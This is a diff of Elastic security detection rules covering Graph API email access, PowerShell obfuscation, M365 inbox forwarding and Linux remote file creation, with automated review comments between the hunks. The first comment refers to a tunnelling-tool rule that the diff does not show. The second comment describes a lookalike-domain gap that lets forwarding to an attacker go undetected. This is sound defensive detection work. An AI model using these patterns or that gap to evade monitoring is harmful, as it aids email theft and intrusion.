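Review bot: The `query` contains no Yuze-specific indicator — neither `yuze.dll` nor `RunYuze`, which the `description` and every step of the `note` treat as the identifying markers — so it matches any unsigned process, or any `rundll32.exe`, started with `reverse` plus `-c`/`-s` or `proxy`/`fwd` plus `-l`. If that generality is intended to survive a renamed DLL or export, the `note` should say so and the False positive analysis should cover benign unsigned tooling with the same argument shape; otherwise adding `process.args : "*RunYuze*"` to the condition aligns the logic with the documented behaviour. The signature branch uses the optional-field form `?process.code_signature.exists == false`, which I read as evaluating to null rather than true when the field is absent, so on data sources without code-signature enrichment only the `rundll32.exe` branch can fire — worth a sentence in `setup`. Several query lines carry trailing spaces before `\n` (`( \n`, `or \n`, `and \n`); strip them.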
@@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.graphactivitylogs-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Graph Request Email Access by Unusual User and Client", + "new_terms_fields": [ + "azure.graphactivitylogs.properties.app_id", + "azure.graphactivitylogs.properties.user_principal_object_id" + ], + "note": "## Triage and analysis\n\n### Investigating Microsoft Graph Request Email Access by Unusual User and Client\n\nThis rule detects instances where a previously unseen or rare Microsoft Graph application client ID accesses email-related APIs, such as `/me/messages`, `/sendMail`, or `/mailFolders/inbox/messages`. These accesses are performed via delegated user credentials using common OAuth scopes like `Mail.Read`, `Mail.ReadWrite`, `Mail.Send`, or `email`. This activity may indicate unauthorized use of a newly consented or compromised application to read or exfiltrate mail content. 
This is a New Terms rule that only signals if the application ID (`azure.graphactivitylogs.properties.app_id`) and user principal object ID (`azure.graphactivitylogs.properties.user_principal_object_id`) have not been seen doing this activity in the last 14 days.\n\n### Possible Investigation Steps:\n\n- `azure.graphactivitylogs.properties.app_id`: Investigate the application ID involved. Is it known and sanctioned in your tenant? Pivot to Azure Portal \u2192 Enterprise Applications \u2192 Search by App ID to determine app details, publisher, and consent status.\n- `azure.graphactivitylogs.properties.scopes`: Review the scopes requested by the application. Email-related scopes such as `Mail.ReadWrite` and `Mail.Send` are especially sensitive and suggest the app is interacting with mail content.\n- `url.path` / `azure.graphactivitylogs.properties.requestUri`: Determine exactly which mail-related APIs were accessed (e.g., reading inbox, sending messages, enumerating folders).\n- `user.id`: Identify the user whose credentials were used. Determine if the user recently consented to a new app, clicked a phishing link, or reported suspicious activity.\n- `user_agent.original`: Check for suspicious automation tools (e.g., `python-requests`, `curl`, non-browser agents), which may suggest scripted access.\n- `source.ip` and `client.geo`: Investigate the source IP and geography. Look for unusual access from unexpected countries, VPS providers, or anonymizing services.\n- `http.request.method`: Determine intent based on HTTP method \u2014 `GET` (reading), `POST` (sending), `PATCH`/`DELETE` (modifying/removing messages).\n- `token_issued_at` and `@timestamp`: Determine how long the token has been active and whether access is ongoing or recent.\n- `azure.graphactivitylogs.properties.c_sid`: Use the session correlation ID to identify other related activity in the same session. 
This may help identify if the app is accessing multiple users' mailboxes or if the same user is accessing multiple apps.\n- Correlate with Microsoft Entra ID (`azure.auditlogs` and `azure.signinlogs`) to determine whether:\n - The app was recently granted admin or user consent\n - Risky sign-ins occurred just prior to or after mail access\n - The same IP or app ID appears across multiple users\n\n### False Positive Analysis\n\n- New legitimate apps may appear after a user consents via OAuth. Developers, third-party tools, or IT-supplied utilities may access mail APIs if users consent.\n- Users leveraging Microsoft development environments (e.g., Visual Studio Code) may trigger this behavior with delegated `.default` permissions.\n- Admin-approved apps deployed via conditional access may trigger similar access logs if not previously seen in detection baselines.\n\n### Response and Remediation\n\n- If access is unauthorized or unexpected:\n - Revoke the app's consent in Azure AD via the Enterprise Applications blade.\n - Revoke user refresh tokens via Microsoft Entra or PowerShell.\n - Investigate the user's session and alert them to possible phishing or OAuth consent abuse.\n- Review and restrict risky OAuth permissions in Conditional Access and App Governance policies.\n- Add known, trusted app IDs to a detection allowlist to reduce noise in the future.\n- Continue monitoring the app ID for additional usage across the tenant or from suspicious IPs.\n", + "query": "event.dataset:azure.graphactivitylogs\n and azure.graphactivitylogs.properties.app_id:*\n and azure.graphactivitylogs.result_signature:200\n and azure.graphactivitylogs.properties.c_idtyp:user\n and azure.graphactivitylogs.properties.client_auth_method:0\n and http.request.method:(DELETE or GET or PATCH or POST or PUT)\n and (\n (\n url.path:(/v1.0/me/*cc or /v1.0/users/*)\n and (\n url.path:((*inbox* or *mail* or *messages*) and not *mailboxSettings*)\n or 
azure.graphactivitylogs.properties.requestUri:(*inbox* or *mail* or *messages*)\n )\n )\n or azure.graphactivitylogs.properties.scopes:(Mail.Read or Mail.ReadWrite or Mail.Send)\n )\n", + "references": [ + "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", + "https://github.com/dirkjanm/ROADtools", + "https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/", + "https://pushsecurity.com/blog/consentfix" + ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.app_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.c_idtyp", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.client_auth_method", + "type": "integer" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.requestUri", + "type": "unknown" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.properties.scopes", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.graphactivitylogs.result_signature", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.request.method", + "type": "keyword" + }, + { + "ecs": true, + "name": "url.path", + "type": "wildcard" + } + ], + "risk_score": 47, + "rule_id": "e882e934-2aaa-11f0-8272-f661ea17fbcc", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: Email", + "Data Source: Azure", + "Data Source: Microsoft Graph", + "Data Source: Microsoft Graph Activity Logs", + "Use Case: Threat Detection", + "Tactic: Collection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + 
"name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 4 + }, + "id": "e882e934-2aaa-11f0-8272-f661ea17fbcc_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9.json b/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9.json deleted file mode 100644 index 32c6178d12e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9.json +++ /dev/null 
@@ -1,183 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use string reordering and runtime reconstruction techniques as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via String Reordering", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via String Reordering\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques like string reordering to evade detection. This involves rearranging strings and reconstructing them at runtime, bypassing static analysis and security measures. The detection rule identifies scripts with excessive length and specific patterns, flagging those with multiple occurrences of string format expressions, which are indicative of obfuscation attempts. 
By filtering out known benign patterns, it reduces false positives, focusing on genuine threats.\n\n### Possible investigation steps\n\n- Review the script block text by examining the powershell.file.script_block_text field to understand the nature of the obfuscation and identify any potentially malicious commands or patterns.\n- Check the file.path and file.name fields to determine the origin and context of the script, which can provide insights into whether the script is part of a legitimate application or a potential threat.\n- Investigate the host.name and user.id fields to identify the affected system and user, which can help in assessing the potential impact and scope of the incident.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and history of the script, which may reveal additional suspicious activities or related scripts.\n- Correlate the alert with other security events or logs from the same host or user to identify any patterns or additional indicators of compromise that may suggest a broader attack campaign.\n\n### False positive analysis\n\n- Scripts related to the Icinga Framework may trigger false positives due to their use of string formatting. To handle this, ensure that the file name \"framework_cache.psm1\" is excluded from the detection rule.\n- PowerShell scripts that include specific sentinel patterns, such as \"sentinelbreakpoints\" or paths like \":::::\\windows\\sentinel\", combined with variables like \"$local:Bypassed\" or \"origPSExecutionPolicyPreference\", are known to be benign. 
These should be excluded to reduce noise.\n- Regularly review and update the exclusion list to include any new benign patterns that are identified over time, ensuring the rule remains effective without generating unnecessary alerts.\n- Consider implementing a whitelist of known safe scripts or script authors to further minimize false positives, especially in environments with frequent legitimate use of complex PowerShell scripts.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread of potentially malicious scripts.\n- Terminate any suspicious PowerShell processes identified by the alert to stop ongoing malicious activity.\n- Conduct a thorough review of the PowerShell script block text flagged by the alert to understand the intent and potential impact of the obfuscated script.\n- Remove any malicious scripts or files identified during the investigation from the affected system to prevent re-execution.\n- Restore the system from a known good backup if the script has caused significant changes or damage to the system.\n- Update and strengthen endpoint protection measures, ensuring that AMSI and other security tools are fully operational and configured to detect similar obfuscation techniques.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*{0}*\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts 
and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"((\\{\\d+\\}){2,}[\"']\\s?-f|::Format[^\\{]+(\\{\\d+\\}){2,})\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least five times\n| where Esql.script_block_pattern_count >= 5\n\n// Exclude Noisy Patterns\n\n// Icinga Framework\n| where not file.directory == \"C:\\\\Program Files\\\\WindowsPowerShell\\\\Modules\\\\icinga-powershell-framework\\\\cache\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory IS NULL\n\n| where not (powershell.file.script_block_text LIKE \"*GitBranchStatus*\" AND \n powershell.file.script_block_text LIKE \"*$s.BranchBehindStatusSymbol.Text*\")\n| where not\n // https://wtfbins.wtf/17\n (\n (powershell.file.script_block_text like \"*sentinelbreakpoints*\" or\n powershell.file.script_block_text like \"*:::::\\\\\\\\windows\\\\\\\\sentinel*\")\n and\n (powershell.file.script_block_text like \"*$local:Bypassed*\" or\n powershell.file.script_block_text like \"*origPSExecutionPolicyPreference*\")\n )\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": 
"Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "e903ce9a-5ce6-4246-bb14-75ed3ec2edf5", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add 
\"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 9 - }, - "id": "e903ce9a-5ce6-4246-bb14-75ed3ec2edf5_9", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213.json b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213.json new file mode 100644 index 00000000000..eff844917e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213.json 
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Gary Blackwell", + "Austin Songer", + "Marco Pedrinazzi" + ], + "description": "Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges.", + "false_positives": [ + "Users and Administrators can create inbox rules for legitimate purposes. Verify if it complies with the company policy and done with the user's consent. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-9m", + "index": [ + "logs-o365.audit-*", + "filebeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "M365 Exchange Inbox Forwarding Rule Created", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating M365 Exchange Inbox Forwarding Rule Created\n\nMicrosoft 365 allows users to create inbox rules to automate email management, such as forwarding messages to another address. While useful, attackers can exploit these rules to secretly redirect emails, facilitating data exfiltration. 
The detection rule monitors for the creation of such forwarding rules, focusing on successful events that specify forwarding parameters, thus identifying potential unauthorized email redirection activities.\n\n### Possible investigation steps\n\n- Review the event details to identify the user account associated with the creation of the forwarding rule by examining the o365.audit.Parameters.\n- Check the destination email address specified in the forwarding rule (ForwardTo, ForwardAsAttachmentTo, or RedirectTo) to determine if it is an external or suspicious address.\n- Investigate the user's recent activity logs in Microsoft 365 to identify any unusual or unauthorized actions, focusing on event.dataset:o365.audit and event.provider:Exchange.\n- Verify if the user has a legitimate reason to create such a forwarding rule by consulting with their manager or reviewing their role and responsibilities.\n- Assess if there have been any recent security incidents or alerts related to the user or the destination email address to identify potential compromise.\n- Consider disabling the forwarding rule temporarily and notifying the user and IT security team if the rule appears suspicious or unauthorized.\n\n### False positive analysis\n\n- Legitimate forwarding rules set by users for convenience or workflow purposes may trigger alerts. Review the context of the rule creation, such as the user and the destination address, to determine if it aligns with normal business operations.\n- Automated systems or third-party applications that integrate with Microsoft 365 might create forwarding rules as part of their functionality. Identify these systems and consider excluding their associated accounts from the rule.\n- Temporary forwarding rules set during user absence, such as vacations or leaves, can be mistaken for malicious activity. 
Implement a process to document and approve such rules, allowing for their exclusion from monitoring during the specified period.\n- Internal forwarding to trusted domains or addresses within the organization might not pose a security risk. Establish a list of trusted internal addresses and configure exceptions for these in the detection rule.\n- Frequent rule changes by specific users, such as IT administrators or support staff, may be part of their job responsibilities. Monitor these accounts separately and adjust the rule to reduce noise from expected behavior.\n\n### Response and remediation\n\n- Immediately disable the forwarding rule by accessing the affected user's mailbox settings in Microsoft 365 and removing any unauthorized forwarding rules.\n- Conduct a thorough review of the affected user's email account for any signs of compromise, such as unusual login activity or unauthorized changes to account settings.\n- Reset the password for the affected user's account and enforce multi-factor authentication (MFA) to prevent further unauthorized access.\n- Notify the user and relevant IT security personnel about the incident, providing details of the unauthorized rule and any potential data exposure.\n- Escalate the incident to the security operations team for further investigation and to determine if other accounts may have been targeted or compromised.\n- Implement additional monitoring on the affected account and similar high-risk accounts to detect any further suspicious activity or rule changes.\n- Review and update email security policies and configurations to prevent similar incidents, ensuring that forwarding rules are monitored and restricted as necessary.", + "query": "web where\n event.provider == \"Exchange\" and\n event.action in (\"New-InboxRule\", \"Set-InboxRule\") and\n event.outcome == \"success\" and\n (\n (?o365.audit.Parameters.ForwardTo != null and not endsWith~(?o365.audit.Parameters.ForwardTo, user.domain)) or\n 
(?o365.audit.Parameters.ForwardAsAttachmentTo != null and not endsWith~(?o365.audit.Parameters.ForwardAsAttachmentTo, user.domain)) or\n (?o365.audit.Parameters.ForwardingAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingAddress, user.domain)) or\n (?o365.audit.Parameters.ForwardingSmtpAddress != null and not endsWith~(?o365.audit.Parameters.ForwardingSmtpAddress, user.domain)) or\n (?o365.audit.Parameters.RedirectTo != null and not endsWith~(?o365.audit.Parameters.RedirectTo, user.domain)) or\n (?o365.audit.Parameters.RedirectToRecipients != null and not endsWith~(?o365.audit.Parameters.RedirectToRecipients, user.domain))\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/responding-to-a-compromised-email-account?view=o365-worldwide", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack?view=o365-worldwide", + "https://raw.githubusercontent.com/PwC-IR/Business-Email-Compromise-Guide/main/Extractor%20Cheat%20Sheet.pdf" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardAsAttachmentTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardingAddress", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.ForwardingSmtpAddress", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectTo", + "type": "unknown" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.RedirectToRecipients", + "type": "unknown" + }, 
+ { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Email", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Configuration Audit", + "Tactic: Collection", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.003", + "name": "Email Forwarding Rule", + "reference": "https://attack.mitre.org/techniques/T1114/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 213 + }, + "id": "ec8efb0c-604d-42fa-ac46-ed1cfbc38f78_213", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_3.json b/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_3.json deleted file mode 100644 index 53cf2fe532a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/ed3fedc3-dd10-45a5-a485-34a8b48cea46_3.json +++ /dev/null 
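Review bot: The internal-domain suppression in the new query, `not endsWith~(?o365.audit.Parameters.ForwardTo, user.domain)` and its five sibling clauses, is a bare suffix test, so a destination whose domain merely ends with the user's domain string (a constructed example: `mail.attacker-example.com` against `example.com`) is classified as internal and the event is dropped; anchoring the suffix with the separator, `not endsWith~(?o365.audit.Parameters.ForwardTo, concat("@", user.domain))`, closes that gap provided the parameter values carry plain SMTP addresses, which should be confirmed against sample events before changing all six clauses. If `user.domain` is absent on an event, each comparison appears to evaluate to null and the whole rule stays silent for that event, so either that field's population on o365.audit events should be verified or a null-tolerant branch added. The investigation guide still names only ForwardTo, ForwardAsAttachmentTo and RedirectTo, while the query now also matches ForwardingAddress, ForwardingSmtpAddress and RedirectToRecipients and excludes same-domain targets; the note should list all six parameters and state the external-domain condition. The description says a rule is "created" although `Set-InboxRule` modifications are matched as well, so it should read "created or modified".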
@@ -1,102 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network.", - "from": "now-9m", - "history_window_start": "now-10d", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Unusual Remote File Creation", - "new_terms_fields": [ - "process.executable", - "host.id" - ], - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Remote File Creation\n\nRemote file creation tools like SCP, FTP, and SFTP are essential for transferring files across networks, often used in legitimate administrative tasks. However, adversaries can exploit these services to move laterally within a network, creating files in unauthorized locations. 
The detection rule identifies suspicious file creation activities by monitoring specific processes and excluding typical paths, thus highlighting potential lateral movement attempts by attackers.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific process name (e.g., scp, ftp, sftp) involved in the file creation event.\n- Examine the file path where the file was created to determine if it is an unusual or unauthorized location, considering the exclusion of typical paths like /dev/ptmx, /run/*, or /var/run/*.\n- Check the user account associated with the process to verify if it is a legitimate user or if there are signs of compromised credentials.\n- Investigate the source and destination IP addresses involved in the file transfer to identify any suspicious or unexpected network connections.\n- Analyze recent activity on the host to identify any other unusual or unauthorized actions that may indicate lateral movement or further compromise.\n- Correlate this event with other alerts or logs to determine if it is part of a broader attack pattern or campaign within the network.\n\n### False positive analysis\n\n- Administrative file transfers: Legitimate administrative tasks often involve transferring files using SCP, FTP, or SFTP. To manage this, create exceptions for known administrative accounts or specific IP addresses that regularly perform these tasks.\n- Automated backup processes: Scheduled backups may use tools like rsync or sftp-server to create files remotely. Identify and exclude these processes by specifying the paths or scripts involved in the backup operations.\n- System updates and patches: Some system updates might involve remote file creation in non-standard directories. Monitor update schedules and exclude these activities by correlating them with known update events.\n- Development and testing environments: Developers may use remote file transfer services to deploy or test applications. 
Establish a baseline of typical development activities and exclude these from alerts by defining specific user accounts or project directories.\n- Third-party integrations: Some third-party applications might require remote file creation as part of their functionality. Document these integrations and exclude their associated processes or file paths from triggering alerts.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further lateral movement within the network. This can be done by removing the host from the network or applying network segmentation controls.\n- Terminate any suspicious processes identified in the alert, such as scp, ftp, sftp, vsftpd, sftp-server, or sync, to stop unauthorized file transfers.\n- Conduct a thorough review of the file paths and files created to determine if any sensitive data has been compromised or if any malicious files have been introduced.\n- Restore any unauthorized or malicious file changes from known good backups to ensure system integrity.\n- Update and patch the affected systems to close any vulnerabilities that may have been exploited by the attacker.\n- Implement stricter access controls and authentication mechanisms for remote file transfer services to prevent unauthorized use.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.\n", - "query": "event.category:file and host.os.type:linux and event.action:creation and\nprocess.name:(scp or ftp or sftp or vsftpd or sftp-server or sync) and\nnot file.path:(/dev/ptmx or /run/* or /var/run/*)\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { 
- "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "ed3fedc3-dd10-45a5-a485-34a8b48cea46", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
